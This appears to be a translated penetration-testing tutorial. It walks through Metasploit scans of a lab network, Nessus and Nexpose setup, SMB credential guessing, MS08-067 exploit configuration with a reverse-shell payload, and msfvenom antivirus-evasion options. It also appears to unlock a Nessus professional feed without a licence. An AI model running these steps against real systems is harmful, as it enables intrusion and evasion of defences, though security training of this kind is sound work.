[*] 192.168.0.1/24:22 - Scanned 245 of 256 hosts (95% complete)
[*] 192.168.0.1/24:22 - Scanned 247 of 256 hosts (96% complete)
[*] 192.168.0.1/24:22 - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
FTP scan
msf6 auxiliary(scanner/ssh/ssh_version) > use auxiliary/scanner/ftp/ftp_version
msf6 auxiliary(scanner/ftp/ftp_version) > set threads 50
threads => 50
msf6 auxiliary(scanner/ftp/ftp_version) > set rhost 192.168.0.1/24
rhost => 192.168.0.1/24
msf6 auxiliary(scanner/ftp/ftp_version) > run
[*] 192.168.0.1/24:21     - Scanned  45 of 256 hosts (17% complete)
[*] 192.168.0.1/24:21     - Scanned  55 of 256 hosts (21% complete)
[*] 192.168.0.1/24:21     - Scanned  99 of 256 hosts (38% complete)
[+] 192.168.0.106:21      - FTP Banner: '220-FileZilla Server version 0.9.41 beta\x0d\x0a220-written by Tim Kosse (Tim.Kosse@gmx.de)\x0d\x0a220 Please visit http://sourceforge.net/projects/filezilla/\x0d\x0a'
[+] 192.168.0.150:21      - FTP Banner: '220 (vsFTPd 3.0.3)\x0d\x0a'
[*] 192.168.0.1/24:21     - Scanned 104 of 256 hosts (40% complete)
[+] 192.168.0.161:21      - FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] 192.168.0.1/24:21     - Scanned 144 of 256 hosts (56% complete)
[*] 192.168.0.1/24:21     - Scanned 154 of 256 hosts (60% complete)
[*] 192.168.0.1/24:21     - Scanned 203 of 256 hosts (79% complete)
[*] 192.168.0.1/24:21     - Scanned 205 of 256 hosts (80% complete)
[*] 192.168.0.1/24:21     - Scanned 253 of 256 hosts (98% complete)
[*] 192.168.0.1/24:21     - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ftp/ftp_version) > use auxiliary/scanner/ftp/anonymous 
msf6 auxiliary(scanner/ftp/anonymous) > set rhost 192.168.0.161
rhost => 192.168.0.161
msf6 auxiliary(scanner/ftp/anonymous) > run
[+] 192.168.0.161:21      - 192.168.0.161:21 - Anonymous READ (220 (vsFTPd 2.3.4))
[*] 192.168.0.161:21      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Conclusion: the FTP server on 192.168.0.161 accepts anonymous logins with read access.
SNMP scan
msf6 auxiliary(scanner/ftp/anonymous) > use auxiliary/scanner/snmp/snmp_login
msf6 auxiliary(scanner/snmp/snmp_login) > set rhost 192.168.0.1/24
rhost => 192.168.0.1/24
msf6 auxiliary(scanner/snmp/snmp_login) > set threads 50
threads => 50
msf6 auxiliary(scanner/snmp/snmp_login) > run
[*] Scanned  50 of 256 hosts (19% complete)
[*] Scanned  54 of 256 hosts (21% complete)
[*] Scanned 100 of 256 hosts (39% complete)
[*] Scanned 104 of 256 hosts (40% complete)
[*] Scanned 134 of 256 hosts (52% complete)
[*] Scanned 157 of 256 hosts (61% complete)
[*] Scanned 181 of 256 hosts (70% complete)
[*] Scanned 208 of 256 hosts (81% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
No host answered the default community strings (snmp_login tries its built-in wordlist against UDP 161), so SNMP is either disabled or not exposed on this segment.

ARP scan
msf6 auxiliary(scanner/snmp/snmp_login) > use auxiliary/scanner/discovery/arp_sweep
msf6 auxiliary(scanner/discovery/arp_sweep) > options
Module options (auxiliary/scanner/discovery/arp_sweep):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   SHOST                       no        Source IP Address
   SMAC                        no        Source MAC Address
   THREADS    1                yes       The number of concurrent threads (max one per host)
   TIMEOUT    5                yes       The number of seconds to wait for new data
msf6 auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 192.168.0.1/24
RHOSTS => 192.168.0.1/24
msf6 auxiliary(scanner/discovery/arp_sweep) > set THREADS 100
THREADS => 100
msf6 auxiliary(scanner/discovery/arp_sweep) > run
[+] 192.168.0.1 appears to be up (UNKNOWN).
[+] 192.168.0.106 appears to be up (UNKNOWN).
[+] 192.168.0.150 appears to be up (VMware, Inc.).
[+] 192.168.0.151 appears to be up (UNKNOWN).
[+] 192.168.0.152 appears to be up (UNKNOWN).
[+] 192.168.0.158 appears to be up (UNKNOWN).
[+] 192.168.0.159 appears to be up (UNKNOWN).
[+] 192.168.0.161 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
HTTP service scan
msf6 auxiliary(scanner/discovery/arp_sweep) > use auxiliary/scanner/http/http_version
msf6 auxiliary(scanner/http/http_version) > set RHOSTS 192.168.0.1/24
RHOSTS => 192.168.0.1/24
msf6 auxiliary(scanner/http/http_version) > set THREADS 100
THREADS => 100
msf6 auxiliary(scanner/http/http_version) > run
[+] 192.168.0.1:80
[*] Scanned  44 of 256 hosts (17% complete)
[*] Scanned  55 of 256 hosts (21% complete)
[*] Scanned  78 of 256 hosts (30% complete)
[+] 192.168.0.106:80 Microsoft-HTTPAPI/2.0
[*] Scanned 104 of 256 hosts (40% complete)
[+] 192.168.0.161:80 Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )
[*] Scanned 136 of 256 hosts (53% complete)
[*] Scanned 175 of 256 hosts (68% complete)
[*] Scanned 187 of 256 hosts (73% complete)
[*] Scanned 209 of 256 hosts (81% complete)
[*] Scanned 235 of 256 hosts (91% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
SMB scan

SMB: the SMB (Server Message Block) protocol was defined by Microsoft and Intel in 1987, mainly as the communication protocol for Microsoft networks. SMB sits at the session layer and the presentation layer, with a small part at the application layer.

SMB uses the NetBIOS application program interface (API). It is also an open protocol that allows protocol extensions, which has made it large and complex: there are roughly 65 top-level operations, each with more than 120 functions, and not even Windows NT supports all of them. Microsoft has since renamed SMB to CIFS (Common Internet File System) and added many new features.

SMB (Server Message Block) is a protocol that can be used for web connections and for communication between clients and servers. SMB was originally developed by Barry Feigenbaum at IBM, with the goal of turning the DOS local file interface "Interrupt 13" into a network file system.

msf6 auxiliary(scanner/http/http_version) > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set THREADS 100
THREADS => 100
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.0.1/24
RHOSTS => 192.168.0.1/24
msf6 auxiliary(scanner/smb/smb_version) > run
[*] 192.168.0.1/24:       - Scanned  39 of 256 hosts (15% complete)
[*] 192.168.0.1/24:       - Scanned  60 of 256 hosts (23% complete)
[*] 192.168.0.151:445     - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-GCM) (signatures:optional) (guid:{d6d3c52d-ff47-48d3-aa4f-7ac8c44d7d96}) (authentication domain:LAPTOP-PH3NSDV2)
[*] 192.168.0.106:445     - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-GCM) (signatures:optional) (guid:{c4aea85c-fbd7-47a2-b5b5-f6ad41c48b6e}) (authentication domain:DESKTOP-9A8VFKB)
[*] 192.168.0.1/24:       - Scanned 104 of 256 hosts (40% complete)
[*] 192.168.0.158:445     - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:4d 1h 5m 2s) (guid:{10a33533-6e55-452c-9c62-13561aafa6e1}) (authentication domain:WIN-2VEIIKHJ7M8)
[+] 192.168.0.158:445     -   Host is running Windows 7 Home Basic SP1 (build:7601) (name:WIN-2VEIIKHJ7M8) (workgroup:WORKGROUP)
[*] 192.168.0.161:445     - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[*] 192.168.0.161:445     -   Host could not be identified: Unix (Samba 3.0.20-Debian)
[*] 192.168.0.1/24:       - Scanned 107 of 256 hosts (41% complete)
[*] 192.168.0.1/24:       - Scanned 159 of 256 hosts (62% complete)
[*] 192.168.0.1/24:       - Scanned 161 of 256 hosts (62% complete)
[*] 192.168.0.1/24:       - Scanned 203 of 256 hosts (79% complete)
[*] 192.168.0.1/24:       - Scanned 206 of 256 hosts (80% complete)
[*] 192.168.0.1/24:       - Scanned 254 of 256 hosts (99% complete)
[*] 192.168.0.1/24:       - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
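As an added example (not part of the original post): a short Python triage of the smb_version output above. It assumes the line format shown in that transcript, the sample text is a constructed subset of those lines, and it pulls out which hosts still answer with SMBv1 and which do not require signing, the two things a defender would fix first after such a sweep.

```python
import re

# Lines as printed by the smb_version run above (a constructed subset of
# that output, kept verbatim so the regexes are exercised on the real format).
SAMPLE_OUTPUT = """\
[*] 192.168.0.1/24:       - Scanned  39 of 256 hosts (15% complete)
[*] 192.168.0.151:445     - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-GCM) (signatures:optional) (guid:{d6d3c52d-ff47-48d3-aa4f-7ac8c44d7d96}) (authentication domain:LAPTOP-PH3NSDV2)
[*] 192.168.0.158:445     - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:4d 1h 5m 2s) (guid:{10a33533-6e55-452c-9c62-13561aafa6e1}) (authentication domain:WIN-2VEIIKHJ7M8)
[+] 192.168.0.158:445     -   Host is running Windows 7 Home Basic SP1 (build:7601) (name:WIN-2VEIIKHJ7M8) (workgroup:WORKGROUP)
[*] 192.168.0.161:445     - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[*] 192.168.0.161:445     -   Host could not be identified: Unix (Samba 3.0.20-Debian)
[*] Auxiliary module execution completed
"""

# "[*] <ip>:445 - SMB Detected (...) (...)" lines carry the protocol facts
DETECT_RE = re.compile(
    r"^\[\*\] (?P<ip>\d{1,3}(?:\.\d{1,3}){3}):445\s+- SMB Detected (?P<attrs>.*)$")
# one "(key:value)" group; keys may contain spaces, values may contain colons
ATTR_RE = re.compile(r"\(([^:()]+):([^()]*)\)")
# "[+] <ip>:445 - Host is running <os> (build:...)" gives the OS fingerprint
OS_RE = re.compile(
    r"^\[\+\] (?P<ip>\d{1,3}(?:\.\d{1,3}){3}):445\s+-\s+Host is running (?P<os>.+?) \(build:")


def ip_key(ip):
    """Numeric sort key so 192.168.0.106 sorts after 192.168.0.1."""
    return tuple(int(p) for p in ip.split("."))


def parse_smb_version(output):
    """Map each host in smb_version output to its dialects, signing and OS."""
    hosts = {}
    for line in output.splitlines():
        m = DETECT_RE.match(line)
        if m:
            attrs = {k.strip(): v.strip() for k, v in ATTR_RE.findall(m.group("attrs"))}
            hosts[m.group("ip")] = {
                "versions": [v.strip() for v in attrs.get("versions", "").split(",") if v.strip()],
                "dialect": attrs.get("preferred dialect", ""),
                "signing": attrs.get("signatures", ""),
                "os": "",
            }
            continue
        m = OS_RE.match(line)
        if m and m.group("ip") in hosts:
            hosts[m.group("ip")]["os"] = m.group("os")
    return hosts


def smbv1_hosts(hosts):
    """Hosts still speaking SMBv1, the precondition the MS17-010 modules need."""
    return sorted((ip for ip, h in hosts.items() if "1" in h["versions"]), key=ip_key)


def signing_not_required(hosts):
    """Hosts whose server does not insist on SMB signing (relay exposure).
    'required' is what the module prints when signing is enforced."""
    return sorted((ip for ip, h in hosts.items() if h["signing"] != "required"), key=ip_key)


if __name__ == "__main__":
    found = parse_smb_version(SAMPLE_OUTPUT)
    print("SMBv1 still enabled:", smbv1_hosts(found))
    print("signing not required:", signing_not_required(found))
```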

Vulnerability scanning

Nexpose
# wget http://download2.rapid7.com/download/NeXpose-v4/NeXposeSetup-Linux64.bin
#chmod a+x NeXposeSetup-Linux64.bin
#./NeXposeSetup-Linux64.bin
#cd /opt/rapid7/nexpose/nsc
#./nsc

Once the login page at https://127.0.0.1:3780/ appears, the installation is done.

Nessus

https://blog.csdn.net/qq_51577576/article/details/123211031

1) Download the package from https://www.tenable.com/downloads/nessus

2) dpkg -i Nessus-10.2.0-debian9_amd64.deb

3) Start the service:
/bin/systemctl start nessusd.service
(equivalently: systemctl start nessusd.service)

4) Open https://127.0.0.1:8834/

5) Stop the service: systemctl stop nessusd.service

6) #gedit /opt/nessus/var/nessus/plugin_feed_info.inc
7) Add the following:
PLUGIN_SET = "202201250216";
PLUGIN_FEED = "ProfessionalFeed (Direct)";
PLUGIN_FEED_TRANSPORT = "Tenable Network Security Lightning";
8)
# cd /opt/nessus/var/nessus/
# mkdir plugins
# cp /opt/nessus/var/nessus/plugin_feed_info.inc /opt/nessus/var/nessus/plugins/

9) Update the plugins (offline plugin archive):
https://pan.baidu.com/s/11sV9Kk0mbzQkLcXqUKxO_g?pwd=462u
#/opt/nessus/sbin/nessuscli update all-2.0-20220209.tar.gz

msf6 > db_connect postgres:123456@127.0.0.1/msf
[*] Connected to Postgres data service: 127.0.0.1/msf
msf6 > db_status
[*] Connected to msf. Connection type: postgresql. Connection name: local_db_service.
msf6 > db_import /home/jerry/jerry_01sqgv.nessus
[*] Importing 'Nessus XML (v2)' data
[*] Importing host 192.168.0.158
[*] Importing host 192.168.0.157
[*] Importing host 192.168.0.151
[*] Importing host 192.168.0.150
[*] Importing host 192.168.0.106
[*] Importing host 192.168.0.1
[*] Successfully imported /home/jerry/jerry_01sqgv.nessus
msf6 > hosts -c address,svcs,vulns
Hosts
=====
address        svcs  vulns
-------        ----  -----
192.168.0.1    2     14
192.168.0.106  23    76
192.168.0.150  6     46
192.168.0.151  4     28
192.168.0.155  3     2
192.168.0.157  4     29
192.168.0.158  10    37

address: IP address

svcs: number of services detected

vulns: number of vulnerabilities found by Nessus

Show all vulnerabilities

msf6 > vulns
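An added example, not from the original post: a parser for the Nessus XML (v2) format that db_import reads, reproducing the address/svcs/vulns columns above from a constructed .nessus fragment. The counting rule is an assumption that approximates Metasploit's hosts table rather than its exact logic, and every plugin ID and name in the sample is made up.

```python
import xml.etree.ElementTree as ET

# Constructed .nessus (v2) fragment for two hosts from the lab network above.
# Not a real Nessus export: plugin IDs, names and severities are sample values.
SAMPLE_NESSUS = """<NessusClientData_v2>
<Report name="lab">
 <ReportHost name="192.168.0.158">
  <HostProperties>
   <tag name="host-ip">192.168.0.158</tag>
   <tag name="operating-system">Windows 7 Home Basic SP1</tag>
  </HostProperties>
  <ReportItem port="445" protocol="tcp" svc_name="cifs" severity="4" pluginID="900001" pluginName="SMB Server Remote Code Execution (sample)"/>
  <ReportItem port="445" protocol="tcp" svc_name="cifs" severity="0" pluginID="900002" pluginName="SMB Service Detection (sample)"/>
  <ReportItem port="139" protocol="tcp" svc_name="smb" severity="0" pluginID="900002" pluginName="SMB Service Detection (sample)"/>
  <ReportItem port="0" protocol="tcp" svc_name="general" severity="0" pluginID="900003" pluginName="Scan Information (sample)"/>
 </ReportHost>
 <ReportHost name="192.168.0.161">
  <HostProperties>
   <tag name="host-ip">192.168.0.161</tag>
   <tag name="operating-system">Linux (Samba 3.0.20-Debian)</tag>
  </HostProperties>
  <ReportItem port="21" protocol="tcp" svc_name="ftp" severity="4" pluginID="900004" pluginName="vsftpd 2.3.4 Backdoor (sample)"/>
  <ReportItem port="21" protocol="tcp" svc_name="ftp" severity="2" pluginID="900005" pluginName="Anonymous FTP Enabled (sample)"/>
  <ReportItem port="445" protocol="tcp" svc_name="cifs" severity="0" pluginID="900002" pluginName="SMB Service Detection (sample)"/>
  <ReportItem port="80" protocol="tcp" svc_name="www" severity="0" pluginID="900006" pluginName="HTTP Server Type and Version (sample)"/>
 </ReportHost>
</Report>
</NessusClientData_v2>
"""


def ip_key(addr):
    """Numeric sort key so 192.168.0.106 sorts after 192.168.0.1."""
    return tuple(int(part) for part in addr.split("."))


def summarize_nessus(xml_text):
    """Summarise a .nessus v2 document per host.

    Counting rule (an assumption approximating what `hosts -c address,svcs,vulns`
    shows after db_import, not Metasploit's exact logic): a service is a distinct
    (port, protocol) with port != 0; a vuln is a distinct plugin ID with severity > 0.
    """
    root = ET.fromstring(xml_text)
    summary = {}
    for host in root.iter("ReportHost"):
        addr = host.get("name")
        os_name = ""
        for tag in host.iter("tag"):
            if tag.get("name") == "host-ip" and tag.text:
                addr = tag.text.strip()
            elif tag.get("name") == "operating-system" and tag.text:
                os_name = tag.text.strip()
        services = set()
        vulns = {}
        for item in host.iter("ReportItem"):
            port = int(item.get("port", "0"))
            proto = item.get("protocol", "tcp")
            severity = int(item.get("severity", "0"))
            if port:
                services.add((port, proto))
            if severity > 0:
                prev = vulns.get(item.get("pluginID"))
                if prev is None or severity > prev["severity"]:   # keep the worst instance
                    vulns[item.get("pluginID")] = {
                        "port": port, "proto": proto, "severity": severity,
                        "name": item.get("pluginName", ""),
                    }
        summary[addr] = {
            "os": os_name,
            "svcs": len(services),
            "vulns": len(vulns),
            "findings": sorted(vulns.values(), key=lambda v: (-v["severity"], v["port"])),
        }
    return summary


def hosts_table(summary):
    """Render the same three columns as `hosts -c address,svcs,vulns`."""
    width = max([len("address")] + [len(a) for a in summary]) + 2
    lines = [f"{'address':<{width}}svcs  vulns", f"{'-------':<{width}}----  -----"]
    for addr in sorted(summary, key=ip_key):
        h = summary[addr]
        lines.append(f"{addr:<{width}}{h['svcs']:<6}{h['vulns']}")
    return "\n".join(lines)


def patch_first(summary, min_severity=3):
    """(severity, address, port, plugin name) rows at or above min_severity,
    worst first: the list a defender works from before the exploit stage."""
    rows = []
    for addr in summary:
        for v in summary[addr]["findings"]:
            if v["severity"] >= min_severity:
                rows.append((v["severity"], addr, v["port"], v["name"]))
    rows.sort(key=lambda r: (-r[0], ip_key(r[1]), r[2]))
    return rows


if __name__ == "__main__":
    s = summarize_nessus(SAMPLE_NESSUS)
    print(hosts_table(s))
    for sev, addr, port, name in patch_first(s):
        print(f"sev {sev}  {addr}:{port}  {name}")
```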

Targeted vulnerability scans
Checking SMB logins
msf6 > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > show options
msf6 auxiliary(scanner/smb/smb_login) > set rhost 192.168.0.106-200
rhost => 192.168.0.106-200
msf6 auxiliary(scanner/smb/smb_login) > set smbuser root
smbuser => root
msf6 auxiliary(scanner/smb/smb_login) > set smbpass 123456
smbpass => 123456
msf6 auxiliary(scanner/smb/smb_login) > set verbose false
verbose => false
msf6 auxiliary(scanner/smb/smb_login) > run
Scanning for VNC servers with no authentication

VNC (Virtual Network Console) is short for virtual network console. It is an excellent remote-control tool developed by AT&T's European research laboratory. VNC is free, open-source software based on UNIX and Linux; its remote-control capability is powerful, efficient and practical, with performance that rivals any remote-control software on Windows and Mac. On Linux, VNC consists of four commands: vncserver, vncviewer, vncpasswd and vncconnect. In most cases users only need two of them: vncserver and vncviewer.

msf6 auxiliary(scanner/smb/smb_login) > use auxiliary/scanner/vnc/vnc_none_auth
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set rhost 192.168.0.106-200
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set threads 100
threads => 100
msf6 auxiliary(scanner/vnc/vnc_none_auth) > run
Scanning for open X11 servers

X11, also called the X Window System (X11 or X), is a bitmap-display windowing system. It is the standard toolkit and protocol for building graphical user interfaces on Unix and Unix-like operating systems and on OpenVMS, and it is available on almost all modern operating systems.

msf6 auxiliary(scanner/vnc/vnc_none_auth) > use auxiliary/scanner/x11/open_x11
msf6 auxiliary(scanner/x11/open_x11) > set rhost 192.168.0.106/24
rhost => 192.168.0.106/24
msf6 auxiliary(scanner/x11/open_x11) > set threads 100
threads => 100
msf6 auxiliary(scanner/x11/open_x11) > run
[*] 192.168.0.106/24:6000 - Scanned  31 of 256 hosts (12% complete)
[*] 192.168.0.106/24:6000 - Scanned  53 of 256 hosts (20% complete)
[*] 192.168.0.106/24:6000 - Scanned 102 of 256 hosts (39% complete)
[-] 192.168.0.157:6000- 192.168.0.157 Access Denied
[*] 192.168.0.106/24:6000 - Scanned 105 of 256 hosts (41% complete)
[*] 192.168.0.106/24:6000 - Scanned 200 of 256 hosts (78% complete)
[*] 192.168.0.106/24:6000 - Scanned 204 of 256 hosts (79% complete)
[*] 192.168.0.106/24:6000 - Scanned 223 of 256 hosts (87% complete)
[*] 192.168.0.106/24:6000 - Scanned 223 of 256 hosts (87% complete)
[*] 192.168.0.106/24:6000 - Scanned 254 of 256 hosts (99% complete)
[*] 192.168.0.106/24:6000 - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

Starting the penetration test

Common msf6 commands

msf6 > show exploits    (list all exploit modules)

msf6 > show exploits
Exploits
========
   #  Name                                                Disclosure Date  Rank       Check  Description
   -  ----                                                ---------------  ----       -----  -----------
   0  exploit/aix/local/ibstat_path                       2013-09-24       excellent  Yes    ibstat $PATH Privilege Escalation
   1  exploit/aix/local/xorg_x11_server                   2018-10-25       great      Yes    Xorg X11 Server Local Privilege Escalation
   2  exploit/aix/rpc_cmsd_opcode21                       2009-10-07       great      No     AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
   3  exploit/aix/rpc_ttdbserverd_realpath                2009-06-17       great      No     ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
   4  exploit/android/adb/adb_server_exec                 2016-01-01       excellent  Yes    Android ADB Debug Server Remote Payload Execution
   5  exploit/android/browser/samsung_knox_smdm_url       2014-11-12       excellent  No     Samsung Galaxy KNOX Android Browser RCE
   6  exploit/android/browser/stagefright_mp4_tx3g_64bit  2015-08-13       normal     No     Android Stagefright MP4 tx3g Integer Overflow
…

msf6 > show auxiliary
Auxiliary
=========
   #  Name                                                       Disclosure Date  Rank    Check  Description
   -  ----                                                       ---------------  ----    -----  -----------
   0  auxiliary/admin/2wire/xslt_password_reset                  2007-08-15       normal  No     2Wire Cross-Site Request Forgery Password Reset Vulnerability
   1  auxiliary/admin/android/google_play_store_uxss_xframe_rce                   normal  No     Android Browser RCE Through Google Play Store XFO
   2  auxiliary/admin/appletv/appletv_display_image                               normal  No     Apple TV Image Remote Control
   3  auxiliary/admin/appletv/appletv_display_video                               normal  No     Apple TV Video Remote Control
   4  auxiliary/admin/atg/atg_client                                              normal  No     Veeder-Root Automatic Tank Gauge (ATG) Administrative Client
…

msf6 > show options
msf6 > use auxiliary/scanner/x11/open_x11
msf6 auxiliary(scanner/x11/open_x11) > back
msf6 > search mysql

msf6 > search ms08_067
Matching Modules
================
   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi 
msf6 exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.150    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
msf>show payloads

Show the payloads available for a module

msf6 > use exploit/windows/smb/ms08_067_netapi
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > show payloads

Select a payload

msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf>show targets
msf6 exploit(windows/smb/ms08_067_netapi) > show targets
Exploit targets:
   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows 2003 SP0 Universal
   4   Windows XP SP2 English (AlwaysOn NX)
   5   Windows XP SP2 English (NX)
   …
   79  Windows 2003 SP2 Russian (NX)
   80  Windows 2003 SP2 Swedish (NX)
   81  Windows 2003 SP2 Turkish (NX)

Show more detail than show targets (full module info)

msf6 exploit(windows/smb/ms08_067_netapi) > info
       Name: MS08-067 Microsoft Server Service Relative Path Stack Corruption
     Module: exploit/windows/smb/ms08_067_netapi
   Platform: Windows
       Arch:
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2008-10-28
Provided by:
  hdm
  Brett Moore brett.moore@insomniasec.com
  frank2
  jduck
Available targets:
   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows 2003 SP0 Universal
   4   Windows XP SP2 English (AlwaysOn NX)
   5   Windows XP SP2 English (NX)
   …
   79  Windows 2003 SP2 Russian (NX)
   80  Windows 2003 SP2 Swedish (NX)
   81  Windows 2003 SP2 Turkish (NX)
Check supported:
  Yes
Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT    445              yes       The SMB service port (TCP)
  SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Payload information:
  Space: 408
  Avoid: 8 characters
Description:
  This module exploits a parsing flaw in the path canonicalization
  code of NetAPI32.dll through the Server Service. This module is
  capable of bypassing NX on some operating systems and service packs.
  The correct target must be used to prevent the Server Service (along
  with a dozen others in the same process) from crashing. Windows XP
  targets seem to handle multiple successful exploitation events, but
  2003 targets will often crash or hang on subsequent attempts. This
  is just the first version of this module, full support for NX bypass
  on 2003, along with other platforms, is still in development.
References:
  https://nvd.nist.gov/vuln/detail/CVE-2008-4250
  OSVDB (49243)
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/MS08-067
  http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos
msf6 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.0.105
lhost => 192.168.0.105
msf6 exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.105    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
msf6 exploit(windows/smb/ms08_067_netapi) > unset lhost
Unsetting lhost...
msf6 exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

Set lhost globally for all modules

msf6 exploit(windows/smb/ms08_067_netapi) > setg lhost 102.168.0.150
lhost => 102.168.0.150
msf6 exploit(windows/smb/ms08_067_netapi) > unsetg lhost

Antivirus evasion

msfvenom

Options:

    -l, --list            <type>      List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
    -p, --payload         <payload>   Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
        --list-options                List --payload <value>'s standard, advanced and evasion options
    -f, --format          <format>    Output format (use --list formats to list)
    -e, --encoder         <encoder>   The encoder to use (use --list encoders to list)
        --service-name    <value>     The service name to use when generating a service binary
        --sec-name        <value>     The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
        --smallest                    Generate the smallest possible payload using all available encoders
        --encrypt         <value>     The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
        --encrypt-key     <value>     A key to be used for --encrypt
        --encrypt-iv      <value>     An initialization vector for --encrypt
    -a, --arch            <arch>      The architecture to use for --payload and --encoders (use --list archs to list)
        --platform        <platform>  The platform for --payload (use --list platforms to list)
    -o, --out             <path>      Save the payload to a file
    -b, --bad-chars       <list>      Characters to avoid, example: '\x00\xff'
    -n, --nopsled         <length>    Prepend a nopsled of [length] size on to the payload
        --pad-nops                    Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
    -s, --space           <length>    The maximum size of the resulting payload
        --encoder-space   <length>    The maximum size of the encoded payload (defaults to the -s value)
    -i, --iterations      <count>     The number of times to encode the payload
    -c, --add-code        <path>      Specify an additional win32 shellcode file to include
    -x, --template        <path>      Specify a custom executable file to use as a template
    -k, --keep                        Preserve the --template behaviour and inject the payload as a new thread
    -v, --var-name        <value>     Specify a custom variable name to use for certain output formats
    -t, --timeout         <second>    The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
    -h, --help                        Show this message

